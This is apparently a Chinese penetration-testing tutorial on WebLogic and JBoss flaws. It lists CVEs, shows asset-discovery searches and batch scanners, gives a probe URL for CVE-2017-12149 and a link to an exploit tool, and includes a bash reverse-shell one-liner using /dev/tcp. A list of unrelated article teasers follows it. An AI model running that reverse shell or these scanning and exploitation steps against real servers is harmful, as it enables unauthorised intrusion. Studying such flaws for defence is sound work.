網安系列【16】之Weblogic和jboss漏洞

文章目錄

  • 一 Weblogic
    • 1.1 Weblogic相關漏洞
    • 1.2 Weblogic漏洞發現
    • 1.3 Weblogic漏洞利用
  • 二 Jboss
    • 2.1 Jboss漏洞
    • 2.2 Jboss識別與漏洞利用

一 Weblogic

  • WebLogic 是由 Oracle公司 開發的一款基于Java EE(現稱Jakarta EE)的企業級應用服務器,主要用于部署、運行和管理分布式Web應用、企業應用和微服務。
  • 優勢:成熟穩定,適合大規模關鍵業務、深度集成Oracle數據庫及其他中間件(如SOA Suite)。
    劣勢:配置復雜,學習曲線陡峭、資源占用較高,成本昂貴(相比開源替代品如WildFly/TomEE)。
    在這里插入圖片描述

1.1 Weblogic相關漏洞

在這里插入圖片描述


主要受影響版本:
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.1
Weblogic 12.2.1.2
Weblogic 12.2.1.3
Weblogic 14.1.1.0


  • 弱口令:Weblogic存在管理后臺,通過賬號密碼登錄,由于管理員的疏忽,經常會使用弱口令,或者默認的賬戶名密碼。
  • SSRF漏洞(CVE-2014-4210):Weblogic中存在一個SSRF漏洞,利用該漏洞可以發送任意HTTP請求,進而可以攻 擊內網中redis、fastcgi等脆弱組件。
  • SSRF(Server-Side Request Forgery,服務器端請求偽造)。SSRF是一種安全漏洞,攻擊者誘使服務器向內部或外部的非預期系統發起惡意請求,從而繞過訪問控制、探測內網或攻擊其他服務。
  • 漏洞原理
    1. 攻擊者控制目標服務器的請求目標:通過篡改URL、參數或文件上傳等功能,讓服務器代替攻擊者訪問內網資源、第三方系統或敏感接口。
    2. 服務器的高權限:服務器通常能訪問內網(如數據庫、管理后臺),而外部用戶無法直接到達這些資源。
  • 任意文件上傳漏洞 (CVE-2018-2894):Web ServiceTestPage 在"生產模式”下默認不開啟,所以該漏洞有一定限制。“利用該漏洞,可以上傳任意jsp文件,進而獲取服務器權限。
  • XML Dec0der反序列化漏洞(CVE-2017-10271):Weblogic的WLSSecurity組件對外提供webservice服務,其中使用了XMLDecoder來解析用戶傳入的XML數據,在解析的過程中出現反序列化漏洞,導致可執行任意命令。
  • Java反序列化漏洞(CVE-2018-2628):Oracle 2018年4月補丁中,修復了Weblogic Server WLS Core Components中出現的一個反序列化漏洞(CVE-2018-2628),該漏洞通過t3協議觸發,可導致未授 權的用戶在遠程服務器執行任意命令。

1.2 Weblogic漏洞發現

  1. 獲取資產:shodan、fofa、鐘馗之眼等,app="BEA-WebLogic-Server"。 google hackhing inurl:漏洞地址intitle:weblogic等。
  2. 批量掃描腳本:WeblogicScan。
  3. 漏洞路徑:_async/AsyncResponseService
    在這里插入圖片描述
    在這里插入圖片描述

1.3 Weblogic漏洞利用


驗證掃描結果(執行命令and反彈shell)

  • 執行掃描命令python3 WeblogicScan -f target.txt,然后利用Java反序列化漏洞利用工具,選擇發現的漏洞類型和服務器的地址,進行檢查,即可實現命令執行。
    在這里插入圖片描述
    在這里插入圖片描述
  • 反彈shell
bash -i >& /dev/tcp/ip/port 0>&1

在這里插入圖片描述

二 Jboss

  • JBoss(現稱 WildFly)是一款開源的、基于Java EE(現Jakarta EE)的應用服務器,由Red Hat公司開發和維護。它用于部署和管理企業級Java應用(如Web服務、分布式系統等),提供高性能、模塊化架構和豐富的企業功能。
組件功能說明
Undertow高性能Web服務器(默認替代Tomcat),支持HTTP/2和WebSocket。
Hibernate集成ORM框架,簡化數據庫操作。
Infinispan分布式緩存系統,用于集群會話共享。
Arquillian測試框架,支持容器內自動化測試。
Management Console Web管理界面(默認端口9990),監控和配置服務器。

2.1 Jboss漏洞


Jboss歷史漏洞 (反序列化漏洞)

  • JBoss JMXlnvokerServlet 反序列化漏洞 (CVE-2015-7501)
  • JBossEJBlnvokerServlet反序列化漏洞
  • JBosS AS 6.X 反序列化漏洞(CVE-2017-12149)
  • JBoss 4.xJBossMQJMS 反序列化漏洞(CVE-2017-7504)

Jboss歷史漏洞 (訪問控制不嚴導致的漏洞)

  • JMXConsole未授權訪問Getshell
  • JMX Console HtmlAdaptor Getshell (CVE-2007-1036)
  • JMX控制臺安全驗證繞過漏洞(CVE-2010-0738) Administration
  • Console 弱口令 Getshell

2.2 Jboss識別與漏洞利用

  1. Jboss漏洞檢測(批量):jbossScan
    在這里插入圖片描述
  • CVE-2017-12149漏洞檢測:http://ip:8080/invoker/readonly訪問該url,若顯示狀態碼為500的報錯界面,則證明漏洞存在。
  • CVE-2017-12149漏洞概述:該漏洞為 Java反序列化錯誤類型,存在于 Jboss 的 Httplnvoker 組件中ReadOnlyAccessFilter過濾器中。該過濾器在沒有進行任何安全檢查的情況下嘗試將來自客戶端的數據流進行反序列化,從而導致了漏洞。
  • CVE-2017-12149漏洞利用(反彈shell):工具https://github.com/joaomatosf/jexboss。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/88873.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/88873.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/88873.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Unity URP + XR 自定義 Skybox 在真機變黑問題全解析與解決方案(支持 Pico、Quest 等一體機)

在使用 Unity 的 URP 渲染管線開發 XR 應用(如 Pico Neo、Pico 4、Quest 2/3 等一體機)時,很多開發者遇到一個奇怪的問題:打包后,Skybox(天空盒)在某些角度下突然變黑,只在轉動頭部后…

Cursor、飛算JavaAI、GitHub Copilot、Gemini CLI 等熱門 AI 開發工具合集

Cursor:代碼編寫的智能伙伴?Cursor 是 Anysphere 公司推出的一款 AI 編程工具,它基于微軟開源代碼編輯器 VS Code 開發,將 AI 技術深度整合到開發人員的工作流程中。Cursor 的功能十分強大,不僅能夠自動用純英文編寫代碼&#xf…

如何安裝歷史版本或指定版本的 git

背景 有的時候,我們需要安裝指定版本的git,或者希望舊一點的,畢竟我就遇到最新的2.50.1在win10安裝后打開就一閃而過,而安裝2.49.1就不會 下載 官網可能比較難找,但是這個github倉庫:https://github.com/gi…

LaCo: Large Language Model Pruning via Layer Collapse

發表:EMNLP_FINDING_2024 機構:Shanghai Jiao Tong University 連接:LaCo: Large Language Model Pruning via Layer Collapse - ACL Anthology 代碼:https://github.com/yangyifei729/LaCo Abstract 基于 Transformer 的大語…

服務器內核級故障排查

目錄 **檢查內核級故障(Oops/Panic)的具體操作步驟****1. 查看完整 `dmesg` 日志(含時間戳)****2. 過濾關鍵錯誤信息****3. 檢查系統日志中的內核消息****4. 分析最近一次啟動的日志****5. 檢查是否有 `vmcore` 轉儲文件****常見內核錯誤示例及含義**補充說明:檢查內核級故…

Flink學習筆記:整體架構

開一個新坑,系統性的學習下 Flink,計劃從整體架構到核心概念再到調優方法,最后是相關源碼的閱讀。 今天就來學習 Flink 整體架構,我們先看官網的架構圖圖中包含三部分,分別是 Client、JobManager 和 TaskManager。其中…

【LeetCode 熱題 100】105. 從前序與中序遍歷序列構造二叉樹——(解法二)O(n)

Problem: 105. 從前序與中序遍歷序列構造二叉樹 給定兩個整數數組 preorder 和 inorder ,其中 preorder 是二叉樹的先序遍歷, inorder 是同一棵樹的中序遍歷,請構造二叉樹并返回其根節點。 【LeetCode 熱題 100】105. 從前序與中序遍歷序列構…

完美卸載 Ubuntu 雙系統:從規劃到實施的完整指南

📖 前言 最近成功完成了一次 Ubuntu 雙系統的完整卸載,從最初的分區刪除到最終解決 GRUB 引導問題,整個過程雖然有些曲折,但最終完美解決。本文將詳細分享整個卸載過程,希望能幫助到有類似需求的朋友。 &#x1f3af…

深入理解oracle ADG和RAC

1. 引言 本節詳細介紹oracle ADG和RAC。當然這里講得的詳細是相對理論的深入,不涉及到實驗,比如ADG和RAC的搭建及調優等。 RAC (Real Application Clusters) 和 ADG (Active Data Guard)是Oracle 的兩大核心高可用和災備技術。它們是 Oracle 數據庫高可用…

網絡安全實踐:從環境搭建到漏洞復現

要求:1.搭建docker2.使用小皮面板搭建pikachu靶場3.使用BP的爆破模塊破解pikachu的登陸密碼步驟4.Kail的msf復現永恒之藍一.搭建docker1. Docker介紹Docker 是容器,可以部分完全封閉。封閉意味:一個物質(放到容器)&…

車載診斷架構 --- 診斷功能開發流程

我是穿拖鞋的漢子,魔都中堅持長期主義的汽車電子工程師。 老規矩,分享一段喜歡的文字,避免自己成為高知識低文化的工程師: 做到欲望極簡,了解自己的真實欲望,不受外在潮流的影響,不盲從,不跟風。把自己的精力全部用在自己。一是去掉多余,凡事找規律,基礎是誠信;二是…

mysql數據庫知識

MySQL數據庫詳解MySQL是目前全球最流行的關系型數據庫管理系統之一,以其開源免費、高效穩定、易于擴展等特點,被廣泛應用于Web開發、企業級應用等場景。本文將從基礎概念、核心特性到實際應用,對MySQL進行全面解析。一、MySQL的基本概念1. 關…

基于springboot的美食文化和旅游推廣系統

博主介紹:java高級開發,從事互聯網行業多年,熟悉各種主流語言,精通java、python、php、爬蟲、web開發,已經做了多年的畢業設計程序開發,開發過上千套畢業設計程序,沒有什么華麗的語言&#xff0…

Rust賦能文心大模型4.5智能開發

文心大模型4.5版本概論 文心大模型4.5是百度推出的最新一代大規模預訓練語言模型,屬于文心大模型(ERNIE)系列。該模型在自然語言處理(NLP)、多模態理解與生成等領域表現出色,廣泛應用于智能搜索、內容創作、對話交互等場景。 核心能力 語言理解與生成 支持復雜語義理解…

前端抓包(不啟動前端項目就能進行后端調試)--whistle

1、安裝 1.1.安裝node.js 1.2.安裝whistle npm install -g whistle2.安裝瀏覽器插件【SwitchyOmega】在谷歌瀏覽器應用商店下載安裝即可配置proxy127.0.0.1:8989是w2 start的端口號啟用代理3.啟動服務(每次抓包都得啟動) w2 start點擊鏈接訪問網頁 http:…

kettle從入門到精通 第102課 ETL之kettle xxl-job調度kettle的兩種方式

之前我們一起學習過xxl-job調度carte,采用的xxl-job執行器方式,不了解的可以查看《kettle從入門到精通 第六十一課 ETL之kettle 任務調度器,輕松使用xxl-job調用kettle中的job和trans 》 今天我們一起來學習下使用xxl-job直接使用http調用…

純前端 JavaScript 實現數據導出到 CSV 格式

日常開發中,數據導出到文件通常有兩種方式: 在后端處理,以文件流或者資源路徑的方式返回;后端返回數據,前端按需處理后再觸發瀏覽器的下載事件,已保存到本地文件。 這里介紹后者的一種零依賴的實現方式。…

香港理工大學實驗室定時預約

香港理工大學實驗室定時預約 文章目錄香港理工大學實驗室定時預約簡介接單價格軟件界面網站預約界面代碼對爬蟲、逆向感興趣的同學可以查看文章,一對一小班教學(系統理論和實戰教程)、提供接單兼職渠道:https://blog.csdn.net/weixin_35770067/article/d…

Spring AI 項目實戰(十七):Spring Boot + AI + 通義千問星辰航空智能機票預訂系統(附完整源碼)

系列文章 序號文章名稱1Spring AI 項目實戰(一):Spring AI 核心模塊入門2Spring AI 項目實戰(二):Spring Boot + AI + DeepSeek 深度實戰(附完整源碼)3Spring AI 項目實戰(三):Spring Boot + AI + DeepSeek 打造智能客服系統(附完整源碼)4

STM32CubeMX+CLion 使用ARM_CMSIS_DSP

安裝 參考: 【CLion開發stm32】如何使用DSP庫 - 未知的奇跡 - 博客園 實際上這樣配置會出一點小問題,現對其修改 1. 項目根目錄下新建 DSP_LIB文件夾 將目錄STM32CubeMX\Repository\STM32Cube_FW_G4_V1.6.1\Drivers\CMSIS\DSP下的Include文件夾和So…